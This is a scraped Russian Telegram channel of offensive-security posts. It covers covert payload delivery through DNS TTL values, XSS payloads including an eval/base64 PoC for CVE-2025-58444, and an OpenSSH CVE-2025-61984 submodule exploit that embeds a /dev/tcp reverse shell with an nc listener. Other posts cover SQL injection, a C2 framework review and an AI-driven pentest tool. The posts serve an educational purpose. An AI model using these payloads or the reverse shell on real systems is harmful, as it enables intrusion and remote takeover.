Это такой параметр который определяет, как долго DNS запись должна храниться в кэше локального DNS сервера или резолвера.Следовательно возможно использовать это время, для доставки полезной нагрузки.
payload > ASCII > TTL
Конвертируем payload в ASCII и каждое значение указываем в TTL каждого поддомена.
Поддомены лучше делать более упрощённым для правильного сбора полезной нагрузки. Например используя циклы:
smtp1.example.com (TTL 105)
smtp2.example.com (TTL 100)
Если конвертировать "105 100" обратно из ASCII, то получаем команду "id"
Использование слишком больших значений тоже допустимо, но не думаю что желательно. Будет выглядеть подозрительно.
Максимально возможный размер = 2147483647
@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6 4
Media is too big
VIEW IN TELEGRAM
Ничесе 🛌
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5 2
Посты J
Photo
Дорогие друзья.
На самом деле есть и более крутые способы доставки, чем заморачиваться с ttl
И полно различных интересных фишек хакинге, о которых знают не многие или знает только сам автор.
Как видите, к сожалению времени у меня очень мало.
В планах был пост, разобрать от А до Я атаку на Аэрофлот. Исходя от полученных данных, сообщений атакующих и т.п, поднял лабораторию и симулировать атаку. В целом лабу поднял, настроил ad, для интереса потом пришла идея ханипоты расставить, чтобы показать как их определять для атакующего и как определять самого атакующего и его планы. Это было очень полезно и познавательно. Надеюсь найду на это время.
Кроме того, у меня есть сложный проект для red team, над которым работаю. Этот инструмент может не только дать мощный буст для красных, но и быстро поднять новичков до приличного уровня и симулировать атаки более эффективно и с большей вероятностью успеха, как если бы это была какая нибудь apt группа.
Я не хочу раскрывать все или важные карты, которые могут уйти в хайп, в котором автор окажется неизвестным или присвоен кем то другим.
Это всё не приносит мне никакого дохода. Пока что.
Я бы открыл онлайн обучения, но это опять гемор составлять план, адаптироваться под каждого. Помимо этого у меня есть ещё основная работа.
Думаю лучший способ сохранить авторство - это написать книгу.
Если у вас есть идеи для содержания книги, буду очень рад если напишите в комментариях, а я постараюсь доработать эту тему до своего максимума.
На самом деле есть и более крутые способы доставки, чем заморачиваться с ttl
И полно различных интересных фишек хакинге, о которых знают не многие или знает только сам автор.
Как видите, к сожалению времени у меня очень мало.
В планах был пост, разобрать от А до Я атаку на Аэрофлот. Исходя от полученных данных, сообщений атакующих и т.п, поднял лабораторию и симулировать атаку. В целом лабу поднял, настроил ad, для интереса потом пришла идея ханипоты расставить, чтобы показать как их определять для атакующего и как определять самого атакующего и его планы. Это было очень полезно и познавательно. Надеюсь найду на это время.
Кроме того, у меня есть сложный проект для red team, над которым работаю. Этот инструмент может не только дать мощный буст для красных, но и быстро поднять новичков до приличного уровня и симулировать атаки более эффективно и с большей вероятностью успеха, как если бы это была какая нибудь apt группа.
Я не хочу раскрывать все или важные карты, которые могут уйти в хайп, в котором автор окажется неизвестным или присвоен кем то другим.
Это всё не приносит мне никакого дохода. Пока что.
Я бы открыл онлайн обучения, но это опять гемор составлять план, адаптироваться под каждого. Помимо этого у меня есть ещё основная работа.
Думаю лучший способ сохранить авторство - это написать книгу.
Если у вас есть идеи для содержания книги, буду очень рад если напишите в комментариях, а я постараюсь доработать эту тему до своего максимума.
👍7 2
Посты J
Ничесе 🛌
Если кому интересно, то на видео в дело идёт этот инструмент:
https://github.com/0x4m4/hexstrike-ai
https://github.com/0x4m4/hexstrike-ai
GitHub
GitHub - 0x4m4/hexstrike-ai: HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.)…
HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.) autonomously run 150+ cybersecurity tools for automated pentesting, vulnerability discovery, bug b...
👍3🐳2 2
Посты J
Если кому интересно, то на видео в дело идёт этот инструмент: https://github.com/0x4m4/hexstrike-ai
Честно? Не рекомендую.
Смысл от того, что за вас будет это делать ИИ?
По такой логике можно открыть готовый пост в Хабре, просто прочесть и пойти спать.
Тут так же за вас всё делают, дают флаг и идёте спать.
Смысл от того, что за вас будет это делать ИИ?
По такой логике можно открыть готовый пост в Хабре, просто прочесть и пойти спать.
Тут так же за вас всё делают, дают флаг и идёте спать.
👍5
XSS довольно популярная уязвимость, но последнее время встречается всё реже, а если и найдётся, эксплуатация может оказаться непростой.
А простые попытки стали реже встречаться благодаря CSP, Trusted Types и современным WAF.
Новые технологии безопасности браузера, а так же WAF значительно усложняют атаку.
Кроме того, современные веб приложения, перестают использовать куки, в пользу хранилища.
А сами PoC, выглядят, например так:
Подобное кодирование url используется в частности для обхода фильтра и waf. В некоторых WAF довольно строгая функция декодировании и может выдать ошибку или вообще не проверить, если синтаксис не совпадает. Следовательно полезная нагрузка едет дальше.
Без url кодировки будет выглядеть вот так:
То есть... Всё предельно очевидно и любая система обычно с таким справляется.
Есть такой вариант:
Где "...", там JavaScript в base64. Декодируется в js и исполняет через eval, а // в конце комментирует всё остальное, чтобы для полезной нагрузки не имела никакого значения и влияния.
Это PoC для CVE-2025-58444 и как ожидается, тут нет никаких серьезных мер безопасности, которые препятствовали бы эксплуатации уязвимости. (Т.е без всякой обфускации, прямо вызывает eval)
Современные EDR/XDR системы заругаются на такое поведение. Хоть это и серьезная уязвимость в конфигурации OAuth, но она имеет смысл только если атакующий может подменить этот документ для клиента.
В качестве PoC они выглядят очень простыми, но при реальных атаках, необходимо самому дописывать, для достижения необходимых задач. В случае xss - это может быть не только угон сессий, но и даже заражения компьютера пользователей, залив троян, под ошибкой, что браузер необходимо срочно обновить.
@jpubl🤓
А простые попытки стали реже встречаться благодаря CSP, Trusted Types и современным WAF.
Новые технологии безопасности браузера, а так же WAF значительно усложняют атаку.
Кроме того, современные веб приложения, перестают использовать куки, в пользу хранилища.
А сами PoC, выглядят, например так:
%3Cnoscript%20xmlns%3D%22http%3A%2F%http://2Fwww.w3.org%2F2000%2Fnoscript%22%3E%3Cnoscript%3Eprompt%28%22XSS%22%29%3C%2Fnoscript%3E%3C%2Fnoscript%3E
Подобное кодирование url используется в частности для обхода фильтра и waf. В некоторых WAF довольно строгая функция декодировании и может выдать ошибку или вообще не проверить, если синтаксис не совпадает. Следовательно полезная нагрузка едет дальше.
Без url кодировки будет выглядеть вот так:
<noscript xmlns="http://www.w3.org/2000/noscript"><noscript>prompt("XSS")</noscript></noscript>То есть... Всё предельно очевидно и любая система обычно с таким справляется.
Есть такой вариант:
{
"authorization_endpoint": "javanoscript:eval(atob('...'));//",
}Где "...", там JavaScript в base64. Декодируется в js и исполняет через eval, а // в конце комментирует всё остальное, чтобы для полезной нагрузки не имела никакого значения и влияния.
Это PoC для CVE-2025-58444 и как ожидается, тут нет никаких серьезных мер безопасности, которые препятствовали бы эксплуатации уязвимости. (Т.е без всякой обфускации, прямо вызывает eval)
Современные EDR/XDR системы заругаются на такое поведение. Хоть это и серьезная уязвимость в конфигурации OAuth, но она имеет смысл только если атакующий может подменить этот документ для клиента.
В качестве PoC они выглядят очень простыми, но при реальных атаках, необходимо самому дописывать, для достижения необходимых задач. В случае xss - это может быть не только угон сессий, но и даже заражения компьютера пользователей, залив троян, под ошибкой, что браузер необходимо срочно обновить.
@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
Я пока заграницей и пока нет возможности писать посты до ~8 числа.
Поэтому время от времени буду присылать уже готовые, но годные публикации.
__
🚬 Руководство по взлому зашифрованных сеансов SSH от братушек китаюшек.
Современный взгляд, новые инструменты на основе старых, в общем интересно.
😊 Читать: https://mp.weixin.qq.com/s/ap3iUBkctCCvNx7KYHi0mA
@jpubl
Поэтому время от времени буду присылать уже готовые, но годные публикации.
__
Современный взгляд, новые инструменты на основе старых, в общем интересно.
@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек
Adaptix C2 и Cobalt Strike: сравнительный аналитический обзор для специалистов по кибербезопасности
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
➡️ Введение
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
➡️ Обзор Adaptix C2
▪️ Архитектура
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
▪️ Особенности
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
🔗 blog.poxek
🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч
#adaptix #cobalt #C2 #redteam #IoC
Я учёл последнии комментарии, что контент на канале скатился, поэтому давайте вместе make Poxek great again)
В современной экосистеме инструментов пост-эксплуатации наблюдается устойчивый тренд: сдвиг от закрытых коммерческих решений к гибким open-source C2-фреймворкам. Если в 2010-х годах доминировали продукты уровня Cobalt Strike и Metasploit Pro, то в середине 2020-х активно появляются проекты нового поколения — такие как Adaptix C2.
Серверная часть: написана на Go, что обеспечивает кроссплатформенность, простоту деплоя и высокую производительность.
- Клиентская часть: Qt/C++ приложение, работающее на Windows, Linux и macOS. Это делает управление C2 доступным с разных ОС, в отличие от ряда конкурентов.
- Модульность: поддержка кастомных агентов и расширений. Ориентация на расширяемость позволяет создавать собственные плагины, команды и интеграции.
Open-source модель — прозрачный код облегчает аудит и кастомизацию, но открывает злоумышленникам доступ к функционалу.
- Активное сообщество — развивается быстрее, чем многие закрытые проекты.
- Применимость — используется как в легитимных Red Team-операциях, так и уже фиксируется в реальных инцидентах.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4 3
Читать: https://habr.com/ru/articles/951354/
_
Стамбул довольно красивый город и интересный, но тут всё очень дорого по сравнению в России.
Из недорогих тут одежда и всякие безделушки. Что касается еды, я мог войти в столовку/забегаловку и поесть досыта за 300-400₽ от души. А тут картофель фри средней порции стоит около (~300 лир)500-600₽.
В целом кухня неплохая, в некоторых местах очень вкусно, а в некоторых дорого и невкусно.
В общем, тут приятно проводить время, но не жить.
Пока так длится мой отдых.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 4 2
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13 3
Если и да, даже самые опытные разработчики могут забыть о том, насколько он важен. Да и не только он.
Если один вариантов прокатит, получим такой результат:
var char_source = "hello
world";
SELECT name FROM city_list where city = "Berlin%22 OR city = %22Lyon";
# как итог
SELECT name FROM city_list where city = "Berlin" OR city = "Lyon";
SELECT ... FROM ... WHERE city = ?;
@jpubl
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8 5
Посты J
Часть 2.
🤭 Проблема у OpenSSH как говорят... CVE-2025-61984 - так его называют.
✏️ Суть в том, что когда клонируешь репозиторий, это происходит либо по ssh, либо по https. Проблема может возникнуть когда за выбором стоит ssh с проблемным конфигом. А теперь к деталям.
😱 Вся история начинается в файле ~/.ssh/config
Который выглядит например так:
😳 То есть, для подключений к гитхаб через SSH используется прокси-команда.
• %r - имя пользователя
• %h - адрес
• %p - порт
🎒 Далее картина в файле .gitmodules с подмодулем, который находится в репозитории.
Он может иметь параметр url.
🦈 Для начала убедимся, что готовы принять подключение от реверсшелла:
👺 Сам url, должен иметь полезную нагрузку:
👀 Или %0a вместо \n
Как это работает?
✊ OpenSsh ожидает url, но url является нестандартным(из-за $[ ), из-за чего возникает синтаксическая ошибка.
🤗 И тут в дело вступает "\n", он разбивает команду, позволяя выполнить полезную нагрузку, который в даёт удаленный доступ.
👮 Даже несмотря на самые строгие фильтры, OpenSSH упустила этот момент. Либо недооценили козявку, либо не знали)
@jpubl - просто простые посты🚬
Который выглядит например так:
Host *.example.com
ProxyCommand bash -c 'nc %r@%h %p'
• %r - имя пользователя
• %h - адрес
• %p - порт
Он может иметь параметр url.
nc -l 4444
url=ssh://$[+\nbash -i >& /dev/tcp/<IP>/4444 0>&1\n@foo.example.com:foo
Как это работает?
@jpubl - просто простые посты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 2 1 1
Есть довольно неплохое колличество различных CTF (например root-me.org) где можно набраться опыта в поиске и эксплуатации xss и узнать каких видов они бывают.
Но стоит делать упор больше сначала на js и тому, какими методами его можно вызвать, а не только за счёт тега noscript, но и за счёт ссылок, атрибутов и прочих файлов, которые поддерживают js(например SVG, которая может показаться безобидной картинкой).
Затем на методы обфускации и кодировки, для обхода фильтров.
Потенциал у xss довольно большой. И заключается не только в угоне сессий. Угон сессий за счёт xss скорее популярное явление, но его можно использовать для подключения рекламных уведомлений, дефейса, если страница имеет разрешение к микрофону или к камере, то свободное использование без запроса на них, заражение компьютера трояном и т.д
Но стоит делать упор больше сначала на js и тому, какими методами его можно вызвать, а не только за счёт тега noscript, но и за счёт ссылок, атрибутов и прочих файлов, которые поддерживают js(например SVG, которая может показаться безобидной картинкой).
Затем на методы обфускации и кодировки, для обхода фильтров.
Потенциал у xss довольно большой. И заключается не только в угоне сессий. Угон сессий за счёт xss скорее популярное явление, но его можно использовать для подключения рекламных уведомлений, дефейса, если страница имеет разрешение к микрофону или к камере, то свободное использование без запроса на них, заражение компьютера трояном и т.д
👍6 5
Owasp top 10 этого года, выдал в свой топ новую категорию. Об этом(А10) я ранее уже писал:
https://news.1rj.ru/str/jpubl/235
Но вот инъекции падают с 3й строчки, на 5ю. Вероятно это связано с появлением ИИ, который показал многим дилетантом, безопасные методы вставки(например при SQL injection), тем не менее, это не исключает возможность существования, а так же другие виды инъекций, благодаря которым распространяются ботнеты.
А03, тоже новая, расширенная категория. Заражённые репы, библиотеки, контейнеры и т.п, объединившись с уязвимыми и устаревшими компоненты ворвались аж до А03
Пост получился краткий, возможно позже распишу подробнее и с примерами.
https://news.1rj.ru/str/jpubl/235
Но вот инъекции падают с 3й строчки, на 5ю. Вероятно это связано с появлением ИИ, который показал многим дилетантом, безопасные методы вставки(например при SQL injection), тем не менее, это не исключает возможность существования, а так же другие виды инъекций, благодаря которым распространяются ботнеты.
А03, тоже новая, расширенная категория. Заражённые репы, библиотеки, контейнеры и т.п, объединившись с уязвимыми и устаревшими компоненты ворвались аж до А03
Пост получился краткий, возможно позже распишу подробнее и с примерами.
👍7
This media is not supported in your browser
VIEW IN TELEGRAM
Максимально простой и лёгкий socks5 прокси клиент, который буквально работает в пару кликов и улучшает пинг в играх(при правильном выборе сервиса). Абсолютно никакого дискомфорта, никаких требований и т.д. Легко, просто и быстро.
Это мой авторский инструмент для одного проекта, но решил вырезать от туда, чтобы был доступен и всем остальным.😊
Оставлю в комментариях
Это мой авторский инструмент для одного проекта, но решил вырезать от туда, чтобы был доступен и всем остальным.
Оставлю в комментариях
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6 4